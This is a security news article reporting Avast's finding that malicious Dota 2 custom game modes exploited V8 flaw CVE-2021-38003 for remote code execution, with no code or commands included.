Hackers Create Malicious Dota 2 Game Modes to Secretly Access Players’ Systems

Feb 13, 2023Ravie LakshmananGame Hacking / Cyber Threat

An unknown threat actor created malicious game modes for the
Dota 2 multiplayer online battle arena (MOBA) video game that could
have been exploited to establish backdoor access to players’
systems.

The modes exploited a high-severity flaw^[1]
in the V8 JavaScript engine tracked as CVE-2021-38003^[2]
(CVSS score: 8.8), which was exploited as a zero-day^[3]
and addressed by Google in October 2021.

“Since V8 was not sandboxed in Dota, the exploit on its own
allowed for remote code execution against other Dota players,”
Avast researcher Jan Vojtěšek said^[4]
in a report published last week.

Following responsible disclosure to Valve, the game publisher
shipped fixes^[5]
on January 12, 2023, by upgrading the version of V8.

Game modes are essentially custom
capabilities^[6] that can either augment
an existing title or offer completely new gameplay in a manner that
deviates from the standard rules.

While publishing a custom game mode to the Steam store includes
a vetting process from Valve, the malicious game modes discovered
by the antivirus vendor managed to slip through the cracks.

These game modes, which have since been taken down, are “test
addon plz ignore,” “Overdog no annoying heroes,” “Custom Hero
Brawl,” and “Overthrow RTZ Edition X10 XP.” The threat actor is
also said to have published a fifth game mode named Brawl in Petah
Tiqwa that did not pack any rogue code.

Embedded inside “test addon plz ignore” is an exploit for the V8
flaw that could be weaponized to execute custom shellcode.

The three others, on the other hand, take a more covert approach
in that the malicious code is designed to reach out to a remote
server to fetch a JavaScript payload, which is also likely to be an
exploit for CVE-2021-38003 since the server is no longer
reachable.

In a hypothetical attack scenario, a player launching one of the
above game modes could be targeted by the threat actor to achieve
remote access to the infected host and deploy additional malware
for further exploitation.

It’s not immediately known what the developer’s end goals were
behind creating the game modes, but they are unlikely to be for
benign research purposes, Avast noted.

“First, the attacker did not report the vulnerability to Valve
(which would generally be considered a nice thing to do),” Vojtěšek
said. “Second, the attacker tried to hide the exploit in a stealthy
backdoor.”

“Regardless, it’s also possible that the attacker didn’t have
purely malicious intentions either, since such an attacker could
arguably abuse this vulnerability with a much larger impact.”